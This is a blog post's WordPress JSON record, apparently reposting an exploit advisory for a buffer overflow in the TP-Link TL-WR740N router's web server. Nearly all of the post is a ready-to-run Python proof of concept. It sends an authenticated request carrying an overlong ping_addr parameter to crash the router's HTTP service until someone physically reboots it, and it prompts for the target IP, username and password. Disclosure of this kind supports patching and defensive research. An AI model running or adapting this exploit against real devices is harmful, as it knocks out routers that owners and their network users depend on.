{"id":55295,"date":"2024-03-11T20:09:38","date_gmt":"2024-03-11T17:09:38","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177515\/tplinktlwr740n-overflowdos.txt"},"modified":"2024-03-12T10:57:37","modified_gmt":"2024-03-12T07:27:37","slug":"tp-link-tl-wr740n-buffer-overflow-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/tp-link-tl-wr740n-buffer-overflow-denial-of-service\/","title":{"rendered":"TP-Link TL-WR740N Buffer Overflow \/ Denial Of Service"},"content":{"rendered":"<p># Exploit Title: TP-Link TL-WR740N &#8211; Buffer Overflow &#8216;DOS&#8217;<br \/>\n# Date: 8\/12\/2023<br \/>\n# Exploit Author: Anish Feroz (ZEROXINN)<br \/>\n# Vendor Homepage: http:\/\/www.tp-link.com<br \/>\n# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br \/>\n# Tested on: TP-Link TL-WR740N<\/p>\n<p>#Description:<\/p>\n<p>#There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. 
To restore the HTTP web server, a user must physically reboot the router.<\/p>\n<p>#Usage:<\/p>\n<p>#python3 target username password<br \/>\n#change port, if required<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;POC&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>#!\/usr\/bin\/python<\/p>\n<p>import requests<br \/>\nfrom requests.auth import HTTPBasicAuth<br \/>\nimport base64<\/p>\n<p>def send_request(ip, username, password):<br \/>\n    auth_url = f\"http:\/\/{ip}:8082\"<br \/>\n    target_url = f\"http:\/\/{ip}:8082\/userRpm\/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&amp;doType=ping&amp;isNew=new&amp;sendNum=4&amp;pSize=64&amp;overTime=800&amp;trHops=20\"<\/p>\n<p>    credentials = f\"{username}:{password}\"<br \/>\n    encoded_credentials = base64.b64encode(credentials.encode()).decode()<\/p>\n<p>    headers = {<br \/>\n        \"Host\": f\"{ip}:8082\",<br \/>\n        \"Authorization\": f\"Basic {encoded_credentials}\",<br \/>\n        \"Upgrade-Insecure-Requests\": \"1\",<br \/>\n        \"User-Agent\": \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/95.0.4638.69 Safari\/537.36\",<br \/>\n        \"Accept\": \"text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\",<br \/>\n        \"Referer\": f\"http:\/\/{ip}:8082\/userRpm\/DiagnosticRpm.htm\",<br \/>\n        \"Accept-Encoding\": \"gzip, deflate\",<br \/>\n        \"Accept-Language\": \"en-US,en;q=0.9\",<br \/>\n        \"Connection\": \"close\"<br \/>\n    }<\/p>\n<p>    session = requests.Session()<\/p>\n<p>    response = session.get(target_url, headers=headers)<\/p>\n<p>    if response.status_code == 200:<br \/>\n        print(\"Server Crashed\")<br \/>\n        print(response.text)<br \/>\n    else:<br \/>\n        print(f\"Script Completed with status code {response.status_code}\")<\/p>\n<p>ip_address = input(\"Enter IP address of the host: \")<br \/>\nusername = input(\"Enter username: \")<br \/>\npassword = input(\"Enter password: \")<\/p>\n<p>send_request(ip_address, username, password)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: TP-Link TL-WR740N &#8211; Buffer Overflow &#8216;DOS&#8217; # Date: 8\/12\/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http:\/\/www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55295","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55295"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55295\/revisions"}],"predecessor-version":[{"id":55298,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55295\/revisions\/55298"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}